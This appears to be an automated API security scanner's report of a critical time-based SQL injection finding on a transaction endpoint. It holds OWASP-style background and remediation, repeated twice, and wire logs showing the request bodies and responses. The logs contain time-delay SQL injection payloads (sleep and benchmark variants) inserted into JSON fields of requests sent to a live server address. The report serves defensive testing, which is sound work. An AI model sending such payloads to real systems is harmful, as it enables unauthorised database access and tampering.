Title: SQL_Injection_Timebound Vulnerability on PUT:/api/v1/primary-transaction
Project: Sanity 7th July
Description:
Assertion
Name: SQL Injection ( 1 )
Overview: SQL Injection is an Attack. It is executed by insertion or “Injection” of either partial or complete SQL query via query parameters, request body parameters, path parameters and passed to the application server/database.
Severity: SQL Injection is classified under the category of “Injection Attacks” by OWASP. “Injection Attacks” is consistently rated at Top 1 Category of Attack by OWASP in years 2010, 2013 and 2017 ( 2 ). SQL Injection is rated top 1 in the CWE / SANS Top 25 ( 3 ) ( 4 ).
Vulnerability Impact: A Successful SQL Injection attack
Can read sensitive data from the database
Can modify the database data thru Insert / Update / Delete statements
Can execute administrative operations on the database
Can recover the content of the given file existing on the database
Can write files into the file system
Can issue commands to the operating System
Exploitation: A successful SQL Injection attack is possible when the attacker crafts a syntactically Correct SQL Query. If an error is thrown back by the API by incorrect query, it will become much easier for the attacker to reconstruct the logic of the original query. If error is hidden, the attacker may have to reverse engineer for an exploitation. It might happen because of the following
User supplied data is NOT validated, filtered or sanitized by the application
Dynamic queries or non-parameterized calls without context-aware escaping
Remediation: A successful SQL Injection attack may possibly be avoided by Secure Coding Practices as outlined by OWASP SQL injection Prevention Cheat Sheet ( 5 ). The following are some of the techniques for remediating SQL Injection attacks.
Title: SQL_Injection_Timebound Vulnerability on PUT:/api/v1/primary-transaction Project: Sanity 7th July Description:
Assertion Name: SQL Injection ( 1 )
Overview: SQL Injection is an Attack. It is executed by insertion or “Injection” of either partial or complete SQL query via query parameters, request body parameters, path parameters and passed to the application server/database.
Severity: SQL Injection is classified under the category of “Injection Attacks” by OWASP. “Injection Attacks” is consistently rated at Top 1 Category of Attack by OWASP in years 2010, 2013 and 2017 ( 2 ). SQL Injection is rated top 1 in the CWE / SANS Top 25 ( 3 ) ( 4 ).
Vulnerability Impact: A Successful SQL Injection attack
- Can read sensitive data from the database
- Can modify the database data thru Insert / Update / Delete statements
- Can execute administrative operations on the database
- Can recover the content of the given file existing on the database
- Can write files into the file system
- Can issue commands to the operating System
Exploitation: A successful SQL Injection attack is possible when the attacker crafts a syntactically Correct SQL Query. If an error is thrown back by the API by incorrect query, it will become much easier for the attacker to reconstruct the logic of the original query. If error is hidden, the attacker may have to reverse engineer for an exploitation. It might happen because of the following- User supplied data is NOT validated, filtered or sanitized by the application
- Dynamic queries or non-parameterized calls without context-aware escaping
Remediation: A successful SQL Injection attack may possibly be avoided by Secure Coding Practices as outlined by OWASP SQL injection Prevention Cheat Sheet ( 5 ). The following are some of the techniques for remediating SQL Injection attacks.- Use of Prepared Statements
- Use of Stored Procedures
- White list input validation
- Escaping all user supplied input
- Enforcing Least Privilege
References:Risk: SQL_Injection_Timebound Severity: Critical API Endpoint: http://95.217.118.53:8080/api/v1/primary-transaction Environment: Master Playbook: ApiV1PrimaryTransactionPutBodyParamSqlInjectionTimebound Researcher: [apisec Bot]
QUICK TIPS
Suggestion: Effort Estimate: null Hrs Wire Logs: 00:45:53 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction] 00:45:53 [D] [AVPTPBPSITimebound] : Method [PUT] 00:45:53 [D] [AVPTPBPSITimebound] : Authorization [Default] 00:45:53 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]] 00:45:53 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "3351", "availableBalance" : "778628553", "createdBy" : "", "createdDate" : "", "description" : "' OR sleep(7)=0; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' OR sleep(7)=0; -- ", "type" : "' OR sleep(7)=0; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' OR sleep(7)=0; -- ", "version" : "" }, "version" : "" }] 00:45:53 [D] [AVPTPBPSITimebound] : Status code [200] 00:45:53 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=Yjc3MmMzYjUtMmNmZS00NjQwLWFkNjYtYmEwMGE0OWNlNTll; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 09 Sep 2021 00:45:52 GMT"]] 00:45:53 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-09T00:45:53.595+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:45:53 [D] [AVPTPBPSITimebound] : Response time [1042] 00:45:53 [D] [AVPTPBPSITimebound] : Response size [306] 00:45:53 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:46:11 [I] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [1042 < 7000] result [Passed] 00:46:13 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction] 00:46:13 [D] [AVPTPBPSITimebound] : Method [PUT] 00:46:13 [D] [AVPTPBPSITimebound] : Authorization [Default] 00:46:13 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]] 00:46:13 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "6855", "availableBalance" : "1213361603", "createdBy" : "", "createdDate" : "", "description" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "type" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' or benchmark(7000000000,charset('abc')) = 0 ; -- ", "version" : "" }, "version" : "" }] 00:46:13 [D] [AVPTPBPSITimebound] : Status code [200] 00:46:13 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=OTY4Y2FhM2YtMzZlYi00ZTZlLTk3OGUtNmQzNjIwNThiMzJl; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 09 Sep 2021 00:46:12 GMT"]] 00:46:13 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-09T00:46:12.920+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:46:13 [D] [AVPTPBPSITimebound] : Response time [1862] 00:46:13 [D] [AVPTPBPSITimebound] : Response size [306] 00:46:13 [I] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [1862 < 7000] result [Passed] 00:46:13 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed] 00:46:30 [D] [AVPTPBPSITimebound] : Endpoint [http://95.217.118.53:8080/api/v1/primary-transaction] 00:46:30 [D] [AVPTPBPSITimebound] : Method [PUT] 00:46:30 [D] [AVPTPBPSITimebound] : Authorization [Default] 00:46:30 [D] [AVPTPBPSITimebound] : Request headers [[Accept:"application/json", Content-Type:"application/json", Authorization=[**]]] 00:46:30 [D] [AVPTPBPSITimebound] : Request [{ "amount" : "3413", "availableBalance" : "255006364", "createdBy" : "", "createdDate" : "", "description" : "' AND sleep(7)=0; -- ", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "status" : "' AND sleep(7)=0; -- ", "type" : "' AND sleep(7)=0; -- ", "user" : { "createdBy" : "", "createdDate" : "", "id" : "", "inactive" : false, "modifiedBy" : "", "modifiedDate" : "", "name" : "' AND sleep(7)=0; -- ", "version" : "" }, "version" : "" }] 00:46:30 [D] [AVPTPBPSITimebound] : Status code [200] 00:46:30 [D] [AVPTPBPSITimebound] : Response headers [[X-Content-Type-Options:"nosniff", X-XSS-Protection:"1; mode=block", Cache-Control:"no-cache, no-store, max-age=0, must-revalidate", Pragma:"no-cache", Expires:"0", X-Frame-Options:"DENY", Set-Cookie:"SESSION=MDk2ZWRhYTctN2VhNi00NjU3LTk0ZGYtZmNkZDQzYzc4M2Q4; Path=/; HttpOnly", Content-Type:"application/json;charset=UTF-8", Transfer-Encoding:"chunked", Date:"Thu, 09 Sep 2021 00:46:13 GMT"]] 00:46:30 [D] [AVPTPBPSITimebound] : Response [{ "requestId" : "None", "requestTime" : "2021-09-09T00:46:14.440+0000", "errors" : true, "messages" : [ { "type" : "ERROR", "key" : "", "value" : "could not extract ResultSet; SQL [n/a]; nested exception is org.hibernate.exception.SQLGrammarException: could not extract ResultSet" } ], "data" : null, "totalPages" : 0, "totalElements" : 0 }] 00:46:30 [D] [AVPTPBPSITimebound] : Response time [17155] 00:46:30 [D] [AVPTPBPSITimebound] : Response size [306] 00:46:30 [E] [AVPTPBPSITimebound] : Assertion [@ResponseTime < 7000] resolved-to [17155 < 7000] result [Failed] 00:46:30 [I] [AVPTPBPSITimebound] : Assertion [@StatusCode != 404] resolved-to [200 != 404] result [Passed]
IMPORTANT LINKS
Vulnerability Details: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8094e17bc3f336017bc8053c967d9c/details
Project: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/allScans
Environment: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/environments/8a8093567a8012b6017a803bf3181500/edit
Scan Dashboard: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/profiles/8a8093567a8012b6017a803c070d16cb/runs/8a8094e17bc3f336017bc800e2637841
Playbook: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/playbooks/ApiV1PrimaryTransactionPutBodyParamSqlInjectionTimebound
Coverage: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/categories
Code Sample: https://cloud.fxlabs.io/#/app/projects/8a8093567a8012b6017a803bf31114fd/dashboard/8a8094e17bc3f336017bc8053c967d9c/codesamples
PS: Please contact support@apisec.ai for apisec access and login issues.
--- apisec Bot ---